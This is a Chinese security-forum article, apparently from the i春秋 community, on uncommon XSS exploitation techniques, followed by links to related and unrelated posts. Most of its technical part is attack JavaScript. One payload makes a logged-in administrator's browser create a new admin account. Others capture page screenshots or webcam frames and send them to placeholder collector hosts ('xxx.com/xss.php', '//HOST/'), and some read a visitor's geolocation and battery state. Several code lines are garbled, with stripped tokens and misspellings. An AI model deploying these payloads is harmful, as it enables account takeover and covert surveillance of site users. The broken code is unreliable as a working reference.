XSS漏洞的渗透利用另类玩法
XSS漏洞的渗透利用另类玩法
作者:色豹
i春秋社区
今天就来讲一下大家都熟悉的 xss漏洞的渗透利用。相信大家对xss已经很熟悉了,但是很多安全人员的意识里 xss漏洞危害只有弹窗或者窃取cookie。但是xss还有更多的花式玩法,今天将介绍几种。
1. xss渗透添加管理员
后台触发存储型XSS,网站设置http-only,窃取的cookie无效。那么如何在这种情况下利用xss漏洞。
无法获取cookie,但是我们可以利用xss漏洞,以管理员的权限,添加一个新的管理员。没错,就是让管理员给我们加一个高权限账号。
这里我们会用到 Java和Ajax 技术。 利用xmlhttp 发送一个http请求,在后台发送一个添加管理员的post请求。
var request = false;
if(window.) {
request = new.();
if(request.overrideMimeType) {
request.overrideMimeType('text/html');
}
} else if(Window.ActiveXObject) {
var versions = {'Microsoft.XMLHTTP','MSXML_XMLHTTP','Microsoft.XMLHTTP','Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0','Msxml2.XMLHTTP.4.0','Msxml2.XMLHTTP.3.0','Msxml2.XMLHTTP'};
for(var i=0; i<versions.length; i ++){
try{
request = new ActiveXObject(versions);
}catch(e){}
}
}
xmlhttp = request;
add_admin();
function add_admin(){
var url = "/admin/admin_add_user.php"; //添加用户请求地址
var params = "username=xss&passwod=123456&email=xss@xss.com&submit=1" //添加用户post数据
xmlhttp.open("POST",url,true);
xmlhttp.setRequstHeader("Content-type","application/x-www-form-urlencoded")
xmlhttp.setRequstHeader("Content-length",params.length);
xmlhttp.setRequstHeader("Connection","close")
}
2. xss截取客户的屏幕
现在随着技术的进步,前端技术支持的面非常广泛。xss漏洞可以利用html5的 canvas 来进行屏幕的截屏功能,类似于远程控制木马查看对方屏幕功能。这个可以大大的提高对于进一步入侵的信息收集。废话不说直接上代码。
这里需要用到一个js库html2canvas.js
document.write("< src="html2canvas.js></>");
window.=function(){
html2canvas(document.body, {
onrendered: function(canvas) {
//下面开始把抓取到的屏幕图片代码传输和接收,由于代码非常的长,只能使用post
xhr=function(){
var request = false;
if(window.){
request = new ();
}else if (window.ActiveXObject){
try{
request = new window.ActiveXObject('Microsoft.XMLHTTP');
}catch(e){
}
}
return request;
}();
request = function(method,src,argv,content_type){
xhr.open(method,src,false);
if(method=='POST')xhr.setRequestHeader('Content-type',content_type);
xhr.send(argv); //发送POST数据
return xhr.responseText;
};
attack_a = function(){
var src = "http://xxx.com/xss.php?"; //post接收地址
var argv_0 = "'&screenshot="+canvas.toDataURL(); //post字段名称为screenshot
request("POST",src,argv_0,"application/x-www-form-urlencoded");
};
attack_a();
}
});
}
上面的代码是针对 pc端的截屏,手机端的截屏xss代码有所不同
<>
d=document;
v=d.('video');
c=d.('canvas');
c.width=640;
c.height=480;
navigator.webkitGetUserMedia({'video':true},function(s){
v.src=URL.createObjectURL(s);v.play()},function(){});
c2=c.getContext('2d');
x='c2.drawImage(v,0,0,640,480);fetch("//HOST/"+c2.canvas.toDataURL())';
setInterval(x,5000);
</>
这两种服务端获取到的post数据包是 格式的 ,我们只要进行转码即可看到对方的屏幕截图。
3.xss对移动端的渗透
现在越来越多的人喜欢用手机查看网页,xss针对手机端的支持也很友好。
这里只针对手机端Firefox浏览器说明。
xss获取对方经纬度代码
<>
navigator.geolocation.getCurrentPosition(function(p){
alert('Latitude:'+p.coords.latitude+',Longitude:'+
p.coords.longitude+',Altitude:'+p.coords.altitude);})
</>
xss获取电池状态的代码,这里需要用到Java Battery API
<svg =alert(navigator.battery.level)>
<svg =alert(navigator.battery.dischargingTime)>
<svg =alert(navigator.battery.charging)>
什么是白帽子?是把技术融入生活,变成故事,宣扬正义。邀请你来i春秋社区,呈现你的故事,讲述你的精彩,欢迎大家来“稿”!
1.【探索新思路】
记一次Github项目被fork后的删除经历
【相信经常使用Github平台来托管程序代码的同学可能都会遇到自己项目被未授权fork走的情况,本人最近就遭遇了这样的情况。】
https://bbs.ichunqiu.com/thread-25588-1-1.html
2.【思路分享】
记一次XSS防御绕过的过程 记一次XSS防御绕过的过程
【一个闲的蛋疼的周末,总想搞点事情,于是在网上找到了个cms系统,得挖出点什么来,嘿嘿】
https://bbs.ichunqiu.com/thread-25625-1-1.html
3.【思路分享】
攻破黑市最流行的钓鱼网站2
【上次有人向我反映,我讲的过于快了,不适合菜鸟看,所以这次我写的相对来说比较详细~ 这对于有基础的人来说可能比较煎熬,哈哈】
https://bbs.ichunqiu.com/thread-25640-1-1.html
4.【思路分享】
看我如何通过野路子撸下权6的BBS论坛
【前两天发现一个BBS社区有解析漏洞,但是注册账号以后发现普通会员没有上传图片权限,只有头像处可以传,但抓不到路径就放弃了,今天想起来就继续研究了下。】
https://bbs.ichunqiu.com/thread-25613-1-1.html
XSS漏洞的渗透利用另类玩法相关推荐
- 【XSS技巧拓展】————14、XSS攻击另类玩法
今天就来讲一下大家都熟悉的 xss漏洞的攻击利用.相信大家对xss已经很熟悉了,但是很多安全人员的意识里 xss漏洞危害只有弹窗或者窃取cookie.但是xss还有更多的花式玩法,今天将介绍几种. 1 ...
- 59深度解密五十九:利用“抖音”进行吸粉的简单、另类玩法
网络营销推广技术.技巧深度解密(五十九)指南: 1.本文档适合零基础和互联网营销推广工作者,主要讲解抖音吸粉的问题. 2.原创版权文档,任何抄袭或者全部.部分模仿都是侵权行为. 3.敬畏法律,尊重原创 ...
- BIOS INT 10-13功能调用的“另类”玩法
http://www.cnblogs.com/ljf9201314/archive/2008/07/21/1247653.html BIOS INT 10-13功能调用的"另类"玩 ...
- 软件也兼职 Word2003的另类玩法(转)
软件也兼职 Word2003的另类玩法(转)[@more@] 大家都知道Word是文字处理软件中佼佼者,不过你知道吗?它还可以播放网络电影.Flash,还具有英汉双向翻译,给词语加注解等有趣功能,本文 ...
- Beef加载msf插件---metasploit对IE浏览器的极光漏洞进行渗透利用
1.配置文件的修改 输入下列命令,打开配置文件, 在图中所示的地方,作出如下修改 再接着输入以下命令,打开另一个配置文件 注意下图所示的三个地方,以及user和pass 接下来切换到beef主目录之下 ...
- 固态和机械硬盘组raid_另类玩法 固态盘和机械盘竟能组RAID
另类玩法 固态盘和机械盘竟能组RAID RAID有很多种,其中RAID 0最为人所熟知,因为它可以成倍地提升存储设备性能.虽然现在组建RAID的过程已经不那么麻烦甚至非常简单,但是很多人依然认为RAI ...
- XSS漏洞原理和利用
XSS漏洞原理和利用 XSS漏洞的危害 1.窃取用户Cookie,如果用户Cookie被窃取,攻击者可以不通过密码,而直接登录用户账户 2.使用XMLHttpRequest构造模拟用户请求操作 3.X ...
- Metasploit 对 IE 浏览器的极光漏洞进行渗透利用
极光漏洞实际上是利用了堆喷射技术.下面我们来演示渗透过程. 1.查看 win xp 系统状态 目前的cpu和内存消耗极低. 2.在kali linux下利用 metasploit 渗透. msf &g ...
- 表情包项目的另类玩法,月赚好几W,情感萌宠精准拿捏用户
文章目录 调研 分析 操作 图片 文案 bgm 链接 调研 这几天我有看到一位博主,他搞了个表情包项目,一个月赚了五六万.我们看下他的视频点赞量,真的不差. 而且我看了下,他玩这个表情包项目的 ...
- 另类玩法,使用 REST API 操作 RabbitMQ
文章目录 1. REST API 2. 开启 Web 管理页面 3. 实践 3.1 查看队列统计数据 3.2 创建队列 3.3 查看当前连接信息 3.4 查看当前用户信息 3.5 创建一个用户 3.6 ...
最新文章
- 机器翻译评测——BLEU算法详解 (新增 在线计算BLEU分值)评估
- Visitor(访问者)模式在SAP CDS view测试框架中的灵活运用
- 智能家居 (1) ——智能家居整体功能框架
- Bootstrap3 表单静态控件
- react-native ES5与ES6写法对照表
- UVA10733 The Colored Cubes【Polya定理】
- 从零基础入门Tensorflow2.0 ----九、44.3 keras模型转换成savedmodel
- 黑马程序员全套Java教程_Java基础入门视频教程零基础自学Java必备教程视频讲义(1)
- 传奇新增物品和装备的内观外观及特效Pak文件详解
- 数据库SQL执行计划
- ssh 远程连接、上传下载命令
- Android实战【仿探探陌生社交APP】
- cad在服务器那个文件夹,CAD存放文件的路径默认在哪里
- Notepad软件的下载安装和使用
- 数字197可以被称为循环素数,因为197的三个数位循环移位后的数字:197,971,719均为素数。100以内这样的数字包括13个,2,3,5,7,11,13,17,31,37,71,73,79,97
- 基金使用计划 数学建模 matlab,数学建模论文-基金使用计划
- HDU6124 Euler theorem
- Linux部署IPFS(分布式存储系统)私有网络
- 前端导出zip格式压缩包
- 科技有意思丨iPhone8新添AR功能?!你的肾还保得住吗